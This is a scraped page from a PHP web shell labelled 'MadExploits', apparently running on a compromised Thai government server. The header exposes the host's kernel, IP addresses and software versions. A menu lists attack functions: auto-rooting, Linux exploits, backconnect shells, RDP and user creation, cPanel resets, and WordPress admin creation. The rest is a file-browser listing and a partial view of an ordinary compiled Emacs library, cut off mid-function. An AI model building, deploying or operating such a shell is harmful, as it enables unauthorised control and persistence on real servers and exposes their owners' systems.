Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
emacs-lisp /
[ HOME SHELL ]
Name
Size
Permission
Action
advice.elc
60.71
KB
-rw-r--r--
assoc.elc
4.37
KB
-rw-r--r--
authors.elc
27.41
KB
-rw-r--r--
autoload.elc
15.7
KB
-rw-r--r--
avl-tree.elc
15.92
KB
-rw-r--r--
backquote.elc
4.46
KB
-rw-r--r--
benchmark.elc
3.33
KB
-rw-r--r--
bindat.elc
10.84
KB
-rw-r--r--
byte-opt.elc
34.22
KB
-rw-r--r--
byte-run.elc
6.65
KB
-rw-r--r--
bytecomp.elc
124.99
KB
-rw-r--r--
check-declare.elc
8.77
KB
-rw-r--r--
checkdoc.elc
65.08
KB
-rw-r--r--
cl-compat.elc
4.28
KB
-rw-r--r--
cl-extra.elc
21.48
KB
-rw-r--r--
cl-indent.elc
13.98
KB
-rw-r--r--
cl-loaddefs.el
39.57
KB
-rw-r--r--
cl-macs.elc
99.36
KB
-rw-r--r--
cl-seq.elc
43.98
KB
-rw-r--r--
cl-specs.el
13.87
KB
-rw-r--r--
cl.elc
20.74
KB
-rw-r--r--
copyright.elc
8.64
KB
-rw-r--r--
crm.elc
7.94
KB
-rw-r--r--
cust-print.elc
12.77
KB
-rw-r--r--
debug.elc
24.86
KB
-rw-r--r--
derived.elc
10.72
KB
-rw-r--r--
disass.elc
5.09
KB
-rw-r--r--
easy-mmode.elc
14.85
KB
-rw-r--r--
easymenu.elc
20.15
KB
-rw-r--r--
edebug.elc
100.82
KB
-rw-r--r--
eldoc.elc
15.31
KB
-rw-r--r--
elint.elc
19.76
KB
-rw-r--r--
elp.elc
12.78
KB
-rw-r--r--
ewoc.elc
28.62
KB
-rw-r--r--
find-func.elc
17.26
KB
-rw-r--r--
find-gc.elc
3.74
KB
-rw-r--r--
float-sup.elc
1.39
KB
-rw-r--r--
generic.elc
6.55
KB
-rw-r--r--
gulp.elc
4.82
KB
-rw-r--r--
helper.elc
3.84
KB
-rw-r--r--
levents.elc
10.29
KB
-rw-r--r--
lisp-mnt.elc
21.87
KB
-rw-r--r--
lisp-mode.elc
37.14
KB
-rw-r--r--
lisp.elc
21.61
KB
-rw-r--r--
lmenu.elc
11.67
KB
-rw-r--r--
lucid.elc
6.22
KB
-rw-r--r--
macroexp.elc
4.45
KB
-rw-r--r--
map-ynp.elc
6.3
KB
-rw-r--r--
pp.elc
5.09
KB
-rw-r--r--
re-builder.elc
22.36
KB
-rw-r--r--
regexp-opt.elc
4.43
KB
-rw-r--r--
regi.elc
6.15
KB
-rw-r--r--
ring.elc
6.41
KB
-rw-r--r--
rx.elc
26.61
KB
-rw-r--r--
shadow.elc
5.63
KB
-rw-r--r--
sregex.elc
12.45
KB
-rw-r--r--
syntax.elc
5.18
KB
-rw-r--r--
tcover-ses.elc
14.68
KB
-rw-r--r--
tcover-unsafep.elc
4.09
KB
-rw-r--r--
testcover.elc
13.41
KB
-rw-r--r--
timer.elc
22.73
KB
-rw-r--r--
tq.elc
3.94
KB
-rw-r--r--
trace.elc
5.28
KB
-rw-r--r--
unsafep.elc
5.01
KB
-rw-r--r--
warnings.elc
9.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:01:59 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/emacs-lisp/autoload.el ;;; in Emacs version 23.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`autoload.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\207" [require lisp-mode help-fns] 2) #@238 *File \[update-file-autoloads] puts autoloads into. A `.el' file can set this in its local variables section to make its autoloads go somewhere else. The autoload file is assumed to contain a trailer starting with a FormFeed character. (defvar generated-autoload-file "loaddefs.el" (#$ . -689)) (put 'generated-autoload-file 'safe-local-variable 'stringp) #@447 Magic comment indicating the following form should be autoloaded. Used by \[update-file-autoloads]. This string should be meaningless to Lisp (e.g., a comment). This string is used: ;;;###autoload (defun function-to-be-autoloaded () ...) If this string appears alone on a line, the following form will be read and an autoload made for it. If there is further text on the line, that text will be copied verbatim to `generated-autoload-file'. (defvar generate-autoload-cookie ";;;###autoload" (#$ . 1053)) #@75 String that marks the form at the start of a new file's autoload section. (defconst generate-autoload-section-header "\f\n;;;### " (#$ . 1568)) #@72 String which indicates the end of the section of autoloads for a file. (defconst generate-autoload-section-trailer "\n;;;***\n" (#$ . 1718)) #@64 String to add on each continuation of the section header form. (defconst generate-autoload-section-continuation ";;;;;; " (#$ . 1865)) #@176 Turn FORM into an autoload or defvar for source file FILE. Returns nil if FORM is not a special autoload form (i.e. a function definition or macro definition or a defcustom). (defalias 'make-autoload #[(form file) "\242\306\211\307>\2036 \310!)\211\2036 @\311=\2036 \312 >\2036 \312 >\211\306\241\210\311\313\314 A\")B\202'\n\315>\203\301 \n\316>.A@/\317\n\320\"\203S \3218\202j \317\n\322\"\203^ \323\202j \317\n\324\"\203i \306\202j \3060\n\325N\233\2111@;\205\200 1\211A1@20<\203\220 \32620\"2\327/<\203\234 /\202\240 \330/D2\n\331>\203\255 \332\202\263 1@\242\333=.\205\273 \330\334D\257-\202'\n\335=\203\362 \243\242\243\243\242\243\243\243\242234\311\336432F\337\3304D\306\340\341\217FE+\202'\n\342=\203&A@5\343\344\345\3305D\346BBDC\347\350\330D\351BB\306\352\3305D\353\354\330D\355BBFFE)\202'\306*\207" [form expand car file load-file-name end nil (easy-mmode-define-global-mode define-global-minor-mode define-globalized-minor-mode easy-mmode-define-minor-mode define-minor-mode) macroexpand progn :autoload-end mapcar #[(form) "\302 \"\207" [form file make-autoload] 3] (defun define-skeleton defmacro define-derived-mode define-compilation-mode define-generic-mode easy-mmode-define-global-mode define-global-minor-mode define-globalized-minor-mode easy-mmode-define-minor-mode define-minor-mode defun* defmacro*) (defmacro defmacro*) memql (defun defmacro defun* defmacro*) 2 (define-skeleton) (&optional str arg) (define-generic-mode define-derived-mode define-compilation-mode) doc-string-elt help-add-fundoc-usage autoload quote (define-skeleton define-derived-mode define-generic-mode easy-mmode-define-global-mode define-global-minor-mode define-globalized-minor-mode easy-mmode-define-minor-mode define-minor-mode) t interactive macro defcustom defvar custom-autoload (byte-code "\302>\211A@)?\207" [form x :set] 3) ((error)) defgroup let loads get ('custom-loads) if member (loads) put 'custom-loads cons (loads) macrop name args body doc init varname groupname] 12 (#$ . 2007)]) (defalias 'autoload-generated-file #[nil "\302\303\300!?\205 \302\304 \"\"\207" [generated-autoload-file source-directory expand-file-name local-variable-p "lisp"] 5]) #@174 Read a section header form. Since continuation lines have been marked as comments, we must copy the text of the form and remove those comment markers before we call `read'. (defalias 'autoload-read-section-header #[nil "\304 \305\216`\306\307y\210\310!\203 \307y\210\202\f \n`{r\311\312!q\210\313 \210 c\210eb\210\314\306\315#\203: \316\317!\210\202+ eb\210\320p!-\207" [save-match-data-internal string beginning generate-autoload-section-continuation match-data ((byte-code "\301\302\"\207" [save-match-data-internal set-match-data evaporate] 3)) nil 1 looking-at get-buffer-create " *autoload*" erase-buffer search-forward t replace-match " " read] 4 (#$ . 4239)]) #@56 Buffer which gets the output of `autoload-print-form'. (defvar autoload-print-form-outbuf nil (#$ . 4920)) #@148 Print FORM such that `make-docfile' will find the docstrings. The variable `autoload-print-form-outbuf' specifies the buffer to put the output in. (defalias 'autoload-print-form #[(form) "@\306=\203 \307\310A\"\2079\203 \311\207\242\303N \211\203\265 8;\203\265 S\233\211A\f\311\241\210\312\313\n\"\210\314\211\211\311\211\203` @\315 \n\"\210\312\316\n\"\210A\211\204I -\312\317\n\"\210r\nq\210`)\312\320 @!\321\311O\n\"\210r\nq\210\212\322\323\314#\203\220 \321u\210\324c\210\202~ * A\204\236 \312\325\n\"\210\202\256 \312\316\n\"\210\312\320 A!\321\311O\n\"\210\326\n!+\202\303 \314\211\211\327\n\"+*\207" [form autoload-print-form-outbuf outbuf doc-string-elt p elt progn mapcar autoload-print-form nil princ "\n(" t prin1 " " "\"\\\n" prin1-to-string 1 re-search-backward "\n[[(]" "\\" ")" terpri print print-escape-nonascii print-quoted print-escape-newlines #1=#:--cl-dolist-temp-- begin] 5 (#$ . 5034)]) #@156 Return a string giving the appropriate autoload rubric for FILE. TYPE (default "autoloads") is a string stating the type of information contained in FILE. (defalias 'autoload-rubric #[(file &optional type) "\303!\304 \305\n\206\f \306\307\310\311\312\313\314 !\315\316\317\320\321\322\323\304 \324\260)\207" [file basename type file-name-nondirectory ";;; " " --- automatically extracted " "autoloads" "\n" ";;\n" ";;; Code:\n\n" "\f\n" "(provide '" file-name-sans-extension ")\n" ";; Local Variables:\n" ";; version-control: never\n" ";; no-byte-compile: t\n" ";; no-update-autoloads: t\n" ";; coding: utf-8\n" ";; End:\n" " ends here\n"] 20 (#$ . 5994)]) #@68 Make sure that the autoload file FILE exists and if not create it. (defalias 'autoload-ensure-default-file #[(file) "\301!\204 \302\303!\304#\210\207" [file file-exists-p write-region autoload-rubric nil] 4 (#$ . 6660)]) #@95 Insert the section-header line, which lists the file name and which functions are in it, etc. (defalias 'autoload-insert-section-header #[(outbuf autoloads load-name file time) "c\210\306\301 \n\f\257 \"\210\307 !\210r q\210\212\310y\210l?\2054 \311\312!\210\313\314w\210l\204 \315\261\210\202 *\207" [generate-autoload-section-header autoloads load-name file time outbuf prin1 terpri -1 move-to-column 64 "^ \n" nil "\n" generate-autoload-section-continuation] 6 (#$ . 6892)]) #@61 Fetch file and put it in a temp buffer. Return the buffer. (defalias 'autoload-find-file #[(file) "\305!r\306\307!q\210\310 \210\311 \210\312\313\314 \210\315!\316\313\"\210\317\320 \210)p)\207" [file buffer-undo-list buffer-read-only default-directory enable-local-variables expand-file-name get-buffer-create " *autoload-file*" kill-all-local-variables erase-buffer t nil emacs-lisp-mode file-name-directory insert-file-contents :safe hack-local-variables] 3 (#$ . 7384)]) #@73 File local variable to prevent scanning this file for autoload cookies. (defvar no-update-autoloads nil (#$ . 7874)) (defalias 'autoload-file-load-name #[(file) "\302!\303\304 \"\203 \305\211\224O\202 )\207" [file name file-name-nondirectory string-match "\\.elc?\\(\\.\\|\\'\\)" 0] 3]) #@304 Insert at point a loaddefs autoload section for FILE. Autoloads are generated for defuns and defmacros in FILE marked by `generate-autoload-cookie' (which see). If FILE is being visited in a buffer, the contents of the buffer are used. Return non-nil in the case where no autoloads were added at point. (defalias 'generate-file-autoloads #[(file) "\301p\"\207" [file autoload-generate-file-autoloads] 3 (#$ . 8174) "fGenerate autoloads for file: "]) #@668 Insert an autoload section for FILE in the appropriate buffer. Autoloads are generated for defuns and defmacros in FILE marked by `generate-autoload-cookie' (which see). If FILE is being visited in a buffer, the contents of the buffer are used. OUTBUF is the buffer in which the autoload statements should be inserted. If OUTBUF is nil, it will be determined by `autoload-generated-file'. If provided, OUTFILE is expected to be the file name of OUTBUF. If OUTFILE is non-nil and FILE specifies a `generated-autoload-file' different from OUTFILE, then OUTBUF is ignored. Return non-nil if and only if FILE adds no autoloads to OUTFILE (or OUTBUF if OUTFILE is nil). (defalias 'autoload-generate-file-autoloads #[(file &optional outbuf outfile) "\300\301\215\207" [done (byte-code "\306\307!\306\211\310\306\311!\306\312!\306\211,-./01r \206* \313!q\2102\204\314\315\"\210\212\214~\210eb\210m\204\314 \316\306w\210\317\3203!!\203\266 \204\204 4\203d 4\321 \232\204d \3065\3105\204x \322!\2115\204x \323\3244\"\210r5q\210\325!`)\3263!\210\327\306w\210l\203\231 \330\331\332\217\210\202= \333\334\306x\210`Tf\335U\203\251 \336u\210`\336y\210`{5\"\210\202= \317\337!\203\302 \336y\210\202= \340\336!\210\336y\210\202= * \203 \341\342!\205\330 p6r5q\210\212 b\210\343510\n6\203\372 \3446\306\211\345$\202\377 \346\347\n!8%\210\350\n\351\261\210)7c\210*\314\352\"\210 \204\353p!\210) ?\206!\f.\207" [file output-start relfile absfile otherbuf visited nil autoload-file-load-name t get-file-buffer expand-file-name autoload-find-file message "Generating autoloads for %s..." " \n\f" looking-at regexp-quote autoload-generated-file autoload-find-destination throw done file-relative-name search-forward " " err (byte-code "\306p!n\204\n \307y\210\310 \"\211\203 A@B\202 \f\311\n!\210+\306\207" [form load-name autoload autoloads-done outbuf autoload-print-form-outbuf read 1 make-autoload autoload-print-form] 4) ((error (message "Error in %s: %S" file err))) princ " \f " 32 1 ";" forward-sexp local-variable-p generated-autoload-file autoload-insert-section-header md5 emacs-mule-unix 5 file-attributes ";;; Generated autoloads from " "\n" "Generating autoloads for %s...done" kill-buffer float-output-format print-readably print-level print-length load-name autoloads-done no-update-autoloads generate-autoload-cookie outfile outbuf secondary-autoloads-file-buf generate-autoload-section-trailer] 12)] 2 (#$ . 8632)]) (defalias 'autoload-save-buffers #[nil "\205 r\211A@q\210\301 \210)\202 \207" [autoload-modified-buffers save-buffer] 2]) #@262 Update the autoloads for FILE in `generated-autoload-file' (which FILE might bind in its local variables). If SAVE-AFTER is non-nil (which is always, when called interactively), save the buffer too. Return FILE if there was no autoload cookie in it, else nil. (defalias 'update-file-autoloads #[(file &optional save-after) "\304\305 !\203 \203 \306 \210\202 t\203 \307\310 \"\210\n\205\"